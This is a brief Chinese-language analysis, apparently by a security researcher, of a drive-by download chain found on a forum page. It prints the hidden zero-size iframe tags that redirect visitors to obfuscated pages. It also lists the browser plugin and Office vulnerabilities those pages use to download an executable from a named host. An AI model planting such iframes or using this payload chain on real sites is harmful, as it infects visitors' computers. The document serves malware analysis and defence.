论坛网页包含代码:
/---
<iframe width='0' height='0' src='hxxp://www.5**4*z**c.cn/1**7aq/q.js'></iframe>
---/
hxxp://www.5**4*z**c.cn/1**7aq/q.js
输出代码:
/---
<IFRaME src="hxxp://m**.sf*s3**wws.cn/03/x4.htm" width=1 height=0></IFRAME>
hxxp://m**.sf*s3**wws.cn/03/x4.htm
包含代码:
/---
<iframe src=google.htm width=100 height=0></Iframe>
---/
hxxp://m**.sf*s3**wws.cn/03/google.htm
采用了一种先前没见过的加密方法,开头一段代码为:
/---
<hTmL><hEaD><Meta Name=Encoder Content=HTMLSHIP>
---/
其功能是:检测浏览器软件类型,如果是IE浏览器,则显示ie.swf,否则显示ff.swf;然后输出代码:
/---
<iframe src=all.htm width=100 height=0></iframe>
---/
hxxp://m**.sf*s3**wws.cn/03/all.htm
采用了相同的加密方法:
用<iframe>引入下列网页,利用漏洞下载hxxp://d1.csygg.com/01/g.exe:
1.htm
利用MS-06014漏洞
kdosn.htm
利用Qvod Player 播放器(clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF)漏洞
kc.htm
利用Baidu工具条(cLSiD:{A7F05EE4-0426-454F-8013-C41E3596E9E9})漏洞下载hxxp://d1.csygg.com/01/Baidu.cab
newlz.htm
利用联众(GLIEDown.IEDown.1,clsid:F917534D-535B-416B-8E8F-0C04756C31A8)漏洞
s.htm
利用新浪(Downloader.DLoader.1,clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A)漏洞
office.htm
利用MS Office(snpvw.Snapshot Viewer Control.1)漏洞
bf.htm
利用暴风影音(MPS.StormPlayer,)漏洞
cx.htm
利用超星阅览器(Pdg2)漏洞
uu.htm
UUSEE网络电视(UUUPGRADE.UUUpgradeCtrl.1)漏洞
2.htm
利用联众世界(HanGamePluginCn18.HanGamePluginCn18.1)漏洞
3.htm
4.htm
利用RealPlayer(IERPCtl.IERPCtl.1)漏洞
0.htm
利用(clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365)漏洞
5.htm
利用MS09-002 漏洞
